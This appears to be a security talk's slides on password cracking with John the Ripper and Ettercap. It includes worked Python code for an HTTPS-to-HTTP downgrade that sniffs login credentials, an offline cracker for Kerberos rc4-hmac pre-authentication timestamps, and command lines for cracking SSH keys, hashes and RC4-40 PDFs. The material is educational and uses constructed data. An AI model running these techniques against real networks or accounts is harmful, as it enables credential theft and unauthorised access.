Advances in Open Source Password Cracking
Agenda
John the Ripper
Ettercap
Attacks on M$ AD / Kerberos infrastructure
Misc. Stuff
Current and future work
John the Ripper
John the Ripper is a free open-source password cracking software tool (http://www.openwall.com/)
Traditionally supports cracking password hashes (LM, traditional DES crypt, FreeBSD MD5 crypt, etc.)
$ cat lm-hash
user:fda95fbeca288d44aad3b435b51404ee
$ john -format:lm lm-hash
Loaded 1 password hash (LM ...)
HELLO (user)
Jumbo patch
Community-enhanced version of JtR, available in almost all Linux distributions
Adds many formats for cracking hashes as well as “non-hashes”
Hashes: e.g. MD5, LM
“non-hashes” : e.g. PDF or other types of files
Can use GPU to accelerate cracking (Speedups > 150X possible)
Jumbo patch supports cracking
1Password, Clipperz, Apple DMG images, EncFS, EPiServer, GPG private keys, IKE PSK, Apple Keychain, GNOME Keyring, KDE KWallet, KeePass, LastPass, Mozilla Master Passwords, MongoDB, MS-CHAP, MySQL authentication protocol, M$ Office, OpenOffice, PDF, O5LOGON, Password Safe, ZIP, RAR, Apple 10.8 hashes, GRUB 2, PFX, SSH keys, PuTTY keys, PostgreSQL, M$ PST, RACF, etc
Above list *only* includes formats I have worked on
Many of these formats are faster than commercial products.
Many formats are not even supported by commercial products
Example: cracking password protected
SSH keys
Two-step process
Use one of the many *2john utilities
$ sshng2john.py key-catch22 > ssh-hash
$ john ssh-hash
Loaded 1 password hash (ssh-ng ...)
catch22 (key-catch22)
Example: using GPU
Build GPU-enabled JtR (e.g. make linux-x86-64-opencl)
$ john -fo:keychain -t
Benchmarking: Mac OS X Keychain ...
Raw: 1331 c/s real, 1331 c/s virtual
$ john -fo:keychain-opencl -t # ATI 7970 GPU
OpenCL platform 1: AMD Accelerated Parallel Processing ...
Benchmarking: Mac OS X Keychain ...
Raw: 208537 c/s real, 92758 c/s virtual
Greater than 150X speedup
JtR community
http://www.openwall.com/lists/john-users/
Join “john-users” mailing list for general discussion and help
Join “john-dev” if you are interested in JtR development
#openwall channel on Freenode IRC network
Writing a plug-in (called a format) is easy enough (start contributing!)
https://github.com/magnumripper/JohnTheRipper
Ettercap
Ettercap is a free, open-source network security tool for doing MiTM attacks.
Allows interception and modification of packets on the fly.
Can be extended by writing plug-ins
Example: Facebook password sniffing
Facebook loads the login form over HTTP; the form POSTs credentials to an HTTPS URL.
Modified the HTTP dissector (ec_http.c) to replace “https” with “ http” (same length, so the packet and its Content-Length stay intact).
Login form is now posted over HTTP.
Ettercap filter functionality can be used to do the same.
Example: Facebook password sniffing
Only 12 lines of code added to ec_http.c
6 lines to avoid gzip encoding and 6 lines to avoid SSL
Also works for Flipkart and Rediffmail.
Ettercap automatically prints credentials sent over HTTP.
Don’t expose / load resources over HTTP
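The two edits behind the Facebook example, worked through in Python as an added example (this is not the talk's C patch to ec_http.c, and the HTTP messages, host name, form field names and the “Accept-Rubbish!” header are constructed for the example, not captured traffic). It shows why the downgrade swaps “https” for “ http” with a leading space: both substitutions keep the byte count unchanged, so nothing downstream (Content-Length, TCP sequence numbers) needs fixing up, and it shows what the dissector then reads off the plaintext POST.

```python
from urllib.parse import parse_qs

# Constructed request/response/POST standing in for captured traffic (example data only).
SAMPLE_REQUEST = (
    b"GET /login.php HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"\r\n"
)
SAMPLE_BODY = (
    b'<form method="post" action="https://www.example.com/login.php">\n'
    b'<input name="email"><input name="pass" type="password"></form>\n'
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(SAMPLE_BODY)
    + SAMPLE_BODY
)
SAMPLE_POST_BODY = b"email=alice%40example.com&pass=s3cret"
SAMPLE_POST = (
    b"POST /login.php HTTP/1.1\r\nHost: www.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(SAMPLE_POST_BODY)
    + SAMPLE_POST_BODY
)


def neutralize_gzip(request: bytes) -> bytes:
    """Step 1 (the 'avoid gzip' edit): rename Accept-Encoding to a header name the server
    ignores, so the response body arrives uncompressed and can be edited in place.
    'Accept-Rubbish!' is the same length (15 bytes) as 'Accept-Encoding'."""
    return request.replace(b"Accept-Encoding", b"Accept-Rubbish!")


def downgrade_https(response: bytes) -> bytes:
    """Step 2 (the 'avoid SSL' edit): rewrite 'https' -> ' http' in the body only.
    The leading space keeps the length equal; browsers strip it from the URL."""
    head, sep, body = response.partition(b"\r\n\r\n")
    return head + sep + body.replace(b"https", b" http")


def is_length_preserving(original: bytes, rewritten: bytes) -> bool:
    """The invariant both rewrites rely on."""
    return len(original) == len(rewritten)


def extract_credentials(post: bytes, fields=("email", "pass")) -> dict:
    """What the dissector prints once the form posts in the clear: the named fields."""
    _, _, body = post.partition(b"\r\n\r\n")
    params = parse_qs(body.decode("utf-8"))
    return {name: params[name][0] for name in fields if name in params}


if __name__ == "__main__":
    req = neutralize_gzip(SAMPLE_REQUEST)
    resp = downgrade_https(SAMPLE_RESPONSE)
    print("lengths preserved:", is_length_preserving(SAMPLE_REQUEST, req),
          is_length_preserving(SAMPLE_RESPONSE, resp))
    print("credentials:", extract_credentials(SAMPLE_POST))
```

The blind `replace` hits every “https” in the body, not just the form action, which is what you want when intercepting; the price is that the page must come back uncompressed, hence the first edit. The only real fix is on the server side: serve the login page itself over HTTPS, as the slide says.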
Ettercap: My contributions
MySQL v5 challenge-response
PostgreSQL challenge-response
VNC challenge-response
O5LOGON protocol (used by Oracle DB)
MongoDB challenge-response
Kerberos MiTM etype downgrade attack
MongoDB MiTM fixed salt attack
Ettercap community
https://github.com/Ettercap/
#ettercap-project channel on Freenode IRC network
Writing a plug-in (called a dissector) is easy once the protocol is understood (use Wireshark)
Attacks on Kerberos and M$ AD infrastructure
Kerberos is a popular network authentication protocol used to implement SSO
Uses shared secret/symmetric keys (which don’t travel over the network)
Uses timestamp pre-authentication (PA-ENC-TIMESTAMP), in which the current timestamp is encrypted with a key derived from the user’s password
We capture the encrypted timestamp from the AS-REQ and mount an offline brute-force attack on the password
Kerberos: Key Derivation
The “string-to-key” function used to convert a user password to a secret key in Kerberos depends on the encryption type (called etype) being used.
The string-to-key functions differ widely in cost: the AES etypes run PBKDF2, while rc4-hmac is a single MD4 of the UTF-16LE password
The etype negotiation process can be attacked to downgrade the etype (and make offline attacks faster)
Kerberos: etype downgrade attacks
Downgrade etype 18 (aes256-cts-hmac-sha1-96, very expensive) to etype 23 (rc4-hmac, very fast)
etype 18 brute-force attack, 380 tries per second on CPU, 125K on ATI 7970 GPU
etype 23 brute-force attack, 728K tries per second on CPU
Speedup > 1900X
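The offline attack on the captured pre-authentication timestamp, worked through for etype 23 as an added example (not code from the talk, Ettercap or JtR). It follows the rc4-hmac construction of RFC 4757: the key is MD4 of the UTF-16LE password (one MD4 call, which is why etype 23 is so much cheaper than the PBKDF2-based string-to-key of etype 18), and a candidate password is confirmed when the HMAC-MD5 checksum over the decrypted timestamp verifies. The AS-REQ, confounder, password and wordlist are constructed here; MD4 is implemented inline because hashlib’s md4 depends on OpenSSL’s legacy provider.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_PA_ENC_TIMESTAMP = 1  # AS-REQ PA-ENC-TIMESTAMP key usage (RFC 4120, 7.5.1)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (no dependency on OpenSSL's legacy provider)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for r in range(48):
            if r < 16:    # round 1: F, no additive constant, words in order
                f, k, add, s = (b & c) | (~b & d), r, 0, (3, 7, 11, 19)[r % 4]
            elif r < 32:  # round 2: G, words 0,4,8,12,1,5,9,13,...
                f, k, add, s = ((b & c) | (b & d) | (c & d), (r % 4) * 4 + (r - 16) // 4,
                                0x5A827999, (3, 5, 9, 13)[r % 4])
            else:         # round 3: H, words 0,8,4,12,2,10,6,14,...
                f, k, add, s = b ^ c ^ d, r3_order[r - 32], 0x6ED9EBA1, (3, 9, 11, 15)[r % 4]
            a, b, c, d = d, _rotl((a + f + x[k] + add) & MASK, s), b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_string_to_key(password: str) -> bytes:
    """etype 23 string-to-key: MD4(UTF-16LE(password)), i.e. the NT hash. One cheap hash."""
    return md4(password.encode("utf-16le"))


def _k1(key: bytes, usage: int) -> bytes:
    # RFC 4757: T is the key usage as a 4-byte little-endian integer (usage 3 maps to 8;
    # usage 1 is used as-is).
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, confounder: bytes, plaintext: bytes) -> bytes:
    """RFC 4757 section 6: edata = checksum || RC4(K3, confounder || data)."""
    k1 = _k1(key, usage)
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Return the plaintext (confounder stripped), or None if the checksum does not verify."""
    k1 = _k1(key, usage)
    checksum, body = edata[:16], edata[16:]
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    pt = rc4(k3, body)
    if not hmac.compare_digest(hmac.new(k1, pt, hashlib.md5).digest(), checksum):
        return None
    return pt[8:]


def crack_timestamp(edata: bytes, wordlist):
    """The offline attack: derive the key for each candidate and test the checksum."""
    for candidate in wordlist:
        if rc4_hmac_decrypt(rc4_hmac_string_to_key(candidate), KEY_USAGE_PA_ENC_TIMESTAMP, edata) is not None:
            return candidate
    return None


# Constructed PA-ENC-TS-ENC (DER): SEQUENCE { [0] KerberosTime "20130821120000Z", [1] usec 123456 }
SAMPLE_TIMESTAMP = bytes.fromhex("301aa011180f") + b"20130821120000Z" + bytes.fromhex("a105020301e240")
SAMPLE_PASSWORD = "Summer2013!"            # constructed; the value the attack should recover
SAMPLE_CONFOUNDER = bytes(range(8))        # a real client uses 8 random bytes
CAPTURED_EDATA = rc4_hmac_encrypt(rc4_hmac_string_to_key(SAMPLE_PASSWORD),
                                  KEY_USAGE_PA_ENC_TIMESTAMP, SAMPLE_CONFOUNDER, SAMPLE_TIMESTAMP)
WORDLIST = ["password", "Password1", "Summer2012!", "Summer2013!", "Winter2013!"]

if __name__ == "__main__":
    print("recovered password:", crack_timestamp(CAPTURED_EDATA, WORDLIST))
```

Every candidate costs one MD4, three HMAC-MD5 calls and one RC4 pass, all fast and easily parallelised on a GPU; with etype 18 the same check starts with PBKDF2-HMAC-SHA1, which is the whole reason the downgrade is worth the 16 lines of plug-in code.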
Kerberos: etype downgrade attacks
These attacks have been talked about previously but tools were not published (maybe not even made).
My Ettercap plug-in is the first public tool to make these attacks practical.
Only 16 lines of code.
Misc : Guaranteed cracking of PDF files using RC4 40-bit encryption
RC4 40-bit encryption is still popular among banks and the income tax department.
https://github.com/kholia/RC4-40-brute-pdf
https://github.com/kholia/qpdf
Exhausting the full 2^40 key space should take less than 2 days on an AMD FX-8120 (8-core Bulldozer)
Misc : Guaranteed cracking of PDF files using RC4 40-bit encryption
Three-step process
$ npdf2john test.pdf
test.pdf:$npdf$1*2*40*4*1*16*c56b…
$ RC4-40-brute 'test.pdf:$npdf$1*2*40*4…'
Key is : 9296c944ee
$ qpdf --key=9296c944ee --decrypt test.pdf output.pdf
Current and future work
Dropbox account “hijacker”
Metasploit post script for doing the same
Offline attacks on LastPass password manager
Fake VMware vCenter (and ESX) server for Metasploit project
Fake LDAP server for Metasploit project
Questions